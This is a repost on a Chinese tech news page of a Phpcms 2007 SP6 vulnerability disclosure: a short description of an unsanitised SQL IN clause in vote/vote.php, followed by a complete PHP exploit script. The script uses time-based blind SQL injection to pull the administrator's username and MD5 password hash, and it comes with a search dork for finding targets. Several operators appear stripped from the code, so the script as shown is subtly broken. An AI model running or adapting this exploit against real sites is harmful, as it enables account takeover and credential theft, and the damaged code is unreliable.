客服电话
APP下载
迪恩网络APP
随时随地掌握行业动态
官方微信
扫描二维码
关注迪恩网络微信公众号
|
漏洞代码: vote/vote.php // 22行 $optionids = is_array($op) ? implode(',',$op) : $op; ... $db->query("UPDATE ".TABLE_VOTE_OPTION." SET number = number 1 WHERE optionid IN ($optionids) "); 漏洞很明显,没什么好说的,其他地方也有类似的问题,有兴趣的同学可以跟下,下面给个poc性质的exp[由于是盲注,效果不是很好]:p 代码: #!/usr/bin/php <?php print_r(' --------------------------------------------------------------------------- Phpcms 2007 SP6 Bind SQL injection / admin credentials disclosure exploit by puret_t mail: puretot at gmail dot com team: http://www.wolvez.org dork: "Powered by Phpcms 2007" --------------------------------------------------------------------------- '); /** * works regardless of php.ini settings */ if ($argc < 3) { print_r(' --------------------------------------------------------------------------- Usage: php '.$argv[0].' host path host: target server (ip/hostname) path: path to phpcms Example: php '.$argv[0].' localhost /phpcms/ --------------------------------------------------------------------------- '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $benchmark = 100000000; $timeout = 10; $cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/ryat#'; $resp = send(); preg_match('/([a-z0-9] )_vote_option/', $resp, $pre); if ($pre) { echo "Plz Waiting...\n"; /** * get admin password */ $j = 1; $pass = ''; $hash[0] = 0; //null $hash = array_merge($hash, range(48, 57)); //numbers $hash = array_merge($hash, range(97, 102)); //a-f letters while (strlen($pass) < 32) { for ($i = 0; $i <= 255; $i ) { if (in_array($i, $hash)) { $cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/(IF((ASCII(SUBSTRING((SELECT/**/password/**/FROM/**/'.$pre[1].'_member/**/WHERE/**/groupid=1/**/LIMIT/**/1),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))#'; send(); usleep(2000000); $starttime = time(); send(); $endtime = time(); $difftime = $endtime - $starttime; if ($difftime > $timeout) { $pass .= chr($i); echo chr($i); break; } } if ($i == 255) exit("\nExploit Failed!\n"); } $j ; } echo "\t"; /** * get admin username */ $j = 1; $user = ''; while (strstr($user, chr(0)) === false) { for ($i = 0; i <= 255; $i ) { $cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/(IF((ASCII(SUBSTRING((SELECT/**/username/**/FROM/**/'.$pre[1].'_member/**/WHERE/**/groupid=1/**/LIMIT/**/1),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))#'; send(); usleep(2000000); $starttime = time(); send(); $endtime = time(); $difftime = $endtime - $starttime; if ($difftime > $timeout) { $user .= chr($i); echo chr($i); break; } if ($i == 255) exit("\nExploit Failed!\n"); } $j ; } exit("Expoilt Success!\nadmin:\t$user\nPassword(md5):\t$pass\n"); } else exit("Exploit Failed!\n"); function send() { global $host, $path, $cmd; $message = "POST ".$path."vote/vote.php HTTP/1.1\r\n"; $message .= "Accept: */*\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "CLIENT-IP: ".time()."\r\n"; $message .= "Host: $host\r\n"; $message .= "Content-Length: ".strlen($cmd)."\r\n"; $message .= "Connection: Close\r\n\r\n"; $message .= $cmd; $fp = fsockopen($host, 80); fputs($fp, $message); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } ?> |
请发表评论